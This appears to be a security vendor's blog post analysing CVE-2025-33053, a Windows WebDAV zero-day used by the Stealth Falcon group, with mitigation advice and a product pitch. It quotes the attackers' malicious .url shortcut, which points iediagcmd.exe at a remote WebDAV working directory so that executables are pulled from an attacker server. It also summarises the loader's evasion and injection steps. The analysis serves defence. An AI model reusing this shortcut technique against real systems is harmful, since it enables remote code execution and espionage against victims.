Stealth Falcon’s WebDAV ZeroDay: How a Simple URL Dropped Dangerous Malware

Every now and then, hackers find clever ways in. This time it was a WebDAV feature in Windows a zero-day vulnerability that slipped through updates. And it’s serious. CVE-2025-33053 gave cyber spies a one-click path to drop malware on target systems. Let’s unpack what happened and why it matters.

What happened?

On June 10, 2025, Microsoft patched a zero-day flaw in WebDAV. It was being actively used by an APT group known as Stealth Falcon (also FruityArmor) in the Middle East.

Stealth Falcon used a weaponized .url file. If a victim clicked it, Windows Internet Explorer Diagnostic tool (iediagcmd.exe) would launch. Instead of running legit tools, it ran malware hosted on a malicious WebDAV server  .

Why WebDAV?

WebDAV extends HTTP, letting apps link to or manage remote files. Windows still supports it especially via IE tools and some apps. That’s where iediagcmd.exe comes in. It’s trusted and alive in modern Windows even after IE was “retired”  .

The .url file looked like this:

[InternetShortcut]

URL=C:\Program Files\Internet Explorer\iediagcmd.exe

WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr

By setting the working folder to the WebDAV server, the exploit tricked Windows into loading executable files from that server instead of system32. A rogue route.exe would run instead of the real route.exe  .

The infection chain

Once iediagcmd launched route.exe from the attacker’s server, the real trouble began. Here is the chain outlined:

1. Horus Loader: A C++ loader heavily obfuscated using Code Virtualizer. It protected itself from reverse-engineering.
2. Anti-analysis tech: The loader manually mapped key DLLs and checked running processes for security tools. It could stop itself if defenses were present.
3. Decoy PDF: Users saw a fake PDF. It decrypted in memory and opened from %temp%, while the loader ran malware behind the scenes.
4. IPfuscation: The real implant was hidden as IPv6 addresses, converted in memory to shellcode.
5. Process injection: A browser process (msedge.exe) was created in suspended mode, injected with the payload, then resumed.

That final payload was the “Horus Agent.” A custom implant built on the Mythic framework. It could:

• Fingerprint the system
• Inject shellcode
• List files
• Exfiltrate data
• Talk to a remote C2 server

Stealth Falcon used it cautiously only advancing if the target was worth it  .

The threat landscape

This is more than a lab exercise. CISA marked CVE-2025-33053 as “known exploited.” Microsoft patched not just modern systems but also old Windows Server 2012 and Windows 8 signaling real urgency  .

Kaspersky called it one of the worst bugs of the June 2025 Patch Tuesday high score (8.8) and live attacks make it a top patch priority  .

It is tied to espionage targeting Turkey, Qatar, Egypt, Yemen and possibly military and government systems. DarkReading emphasized the one-click nature: just open a .url file and you’re in.

Why it worked

Several conditions made this exploit powerful:

• Trusted tools: Attackers piggy-backed on legitimate Windows utilities.
• Remote DLL/executable loading: WebDAV let them sidestep local protection.
• One-click delivery: Phishing was enough.
• Complex loaders and evasion: The code stayed hidden with obfuscation, encrypted payloads, IPfuscation and process injection.

Stealth Falcon showed sophistication and restraint deploying full backdoors only when needed  .

What users and admins should do

1. Patch immediately. Microsoft’s June update covers the flaw even on old systems .
2. Disrupt WebDAV until you patch disable WebClient service or block ports 80/443.
3. Use security tools that detect abnormal DLL loads, suspicious working folders, or injection behaviors.
4. Train staff: Don’t click unknown .url attachments.
5. Watch for anomalies: New processes launched from %temp%, odd DLL loads, suspicious network calls.

How Vicarius helps

This is where Vicarius steps in. Our team released a detection script tailored for CVE-2025-33053. It hunts for signs of WebDAV misuse like odd working directory entries or iediagcmd.exe spawning from remote folders.

With Vicarius you can:

• Detect early: The script picks up suspicious attempts to exploit the vulnerability.
• Block exploitation attempts: It watches for when helpers are tricked into loading malware.
• Automate prevention: Rules can disable risky services like WebClient automatically.
• Speed up response: Alert when indicators appear, so you act fast.

we offer these scripts through our vSociety community. Users can easily plug them in and harden systems before attackers hit again.  Detection script ,  Mitigation Script

It doesn’t take a complex exploit to cause serious damage. Sometimes, it’s just a misused shortcut file and a forgotten protocol. This attack is a reminder that even trusted tools and legacy services can become liabilities.

If you’re not already watching for these paths, now’s the time to start. Vicarius makes that easier with tools that detect the unusual before it becomes dangerous, and with automation that cuts off risks before they spread.

Because staying ahead of attackers isn’t about chasing every alert. It’s about fixing the ones that matter.

‍